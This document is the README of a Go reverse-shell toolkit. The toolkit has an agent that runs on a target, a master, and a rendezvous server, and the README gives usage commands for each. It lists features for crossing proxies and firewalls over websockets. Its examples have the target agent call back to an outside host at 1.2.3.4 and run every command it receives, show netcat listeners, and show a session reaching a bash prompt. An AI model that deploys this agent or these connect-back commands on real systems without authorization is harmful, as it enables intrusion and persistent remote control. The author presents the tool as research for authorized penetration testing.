Disclaimer: This project is for research purposes only, and should only be used on authorized systems. Accessing a computer system or network without authorization or explicit permission is illegal. My primary goal was to write some Go.

"A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved." (source)

Of course the simplest and most portable way is to use Netcat.

Here is a some features of this Go implementation:

• good portability
• can cross most proxies and firewalls with default configuration (using websockets, on https, on standard ports)
• auto-reconnection
• supports having multiple shells running on a single agent

This projects contains 3 applications that help you setting and interacting with remote shells:

• an agent to be started on the server where you want to open a shell
• a master waiting for agent connections and that allow you to interact with the shells
• a rendezvous application providing a central point where agents and masters meet when a direct connection is not possible/wanted (not mandatory)

Download the binaries

curl -O -L -s /dev/null https://github.com/maxlaverse/reverse-shell/releases/download/v0.0.1/reverse-shell-0.0.1-linux-amd64.tar.gz | tar xvz

Or build from source

$ git clone https://github.com/maxlaverse/reverse-shell
$ cd reverse-shell && make

The agent is an application that will start one or multiple shells and allow a master to control them.

Usage:
  agent [OPTIONS] <command>

Available commands:
  stdin      Start a stdin agent
  tcp        Start a tcp agent and connect to a remote master
  tcpdirect  Start a tcpdirect agent and listen on a tcp port waiting for orders
  websocket  Start a websocketCommand agent and connect to a remote master or rendez-vous

Absolutely useless. It's basically just piping stdin to a process on the same machine.

Usage:
  agent [OPTIONS] stdin

Connect to a remote host and execute every command received from it.

Usage:
  agent [OPTIONS] tcp [tcp-OPTIONS]

[tcp command options]
      -A, --address= Address [$ADDRESS]

Use the listen master command on a remote host to wait for connection:

# On the master (1.2.3.4)
$ nc -v -l -p 7777

# On the target
$ agent tcp -A 1.2.3.4:7777

Listen to a tcp port and execute every command received by a master.

Usage:
  agent [OPTIONS] tcpdirect [tcp-OPTIONS]

  [tcpdirect command options]
        -P, --port= Port [$PORT]

You can connect to it using netcat:

# On the agent (1.2.3.4)
$ agent tcpdirect -P 7777

# On the master
$ nc 1.2.3.4 7777

Connect to a remote websocket and execute every command received. The remote host can be a master or a rendezvous.

Usage:
  agent [OPTIONS] websocket [websocket-OPTIONS]

[websocket command options]
      -U, --url=  Url of the rendez-vous point. [$URL]

# On the master (1.2.3.4)
$ master listen -P 7777

# On the agent
$ agent websocket -U http://1.2.3.4:7777

Once an agent connects, you will be able to write commands in stdin that will be directly executed on the agent. You can also connect to a rendezvous point instead of a master.

You can also connect to the outside using a proxy:

$ http_proxy=http://your-proxy:3128 https_proxy=http://your-proxy:3128 agent websocket -U http://1.2.3.4:7777

The rendezvous is an http server listening for agents and masters. It can run behind a reverse-proxy and that reverse-proxy could to SSL offloading.

Usage:
  rendezvous [OPTIONS]

Application Options:
  -P, --port= Port [$PORT]

Start the rendezvous and the agent:

# On the rendezvous (1.2.3.4)
$ rendezvous -P 7777

# On the agent (3.4.5.6)
$ agent websocket -U http://1.2.3.4:7777

Open a shell and send some commands

# List the agents
$ ./master list-agents -U http://1.2.3.4:7777
List of agents:
* 3.4.5.6:65000

# Create a session
$ master create -U http://1.2.3.4:7777 3.4.5.6:65000
Attaching to admiring_meitn
Connected to admiring_meitn
bash-3.2$

Usage:
  master [OPTIONS] <command>

Help Options:
  -h, --help  Show this help message

Available commands:
  attach         attach to an existing session
  create         create a new session on a given agent
  list-agents    list all the agents available on a rendez-vous
  list-sessions  list all the sessions available on a rendez-vous
  listen         listen for agents to connect using websocket

• learn how to write proper tests
• add scp-like commands
• improve logging messages
• read variables from environment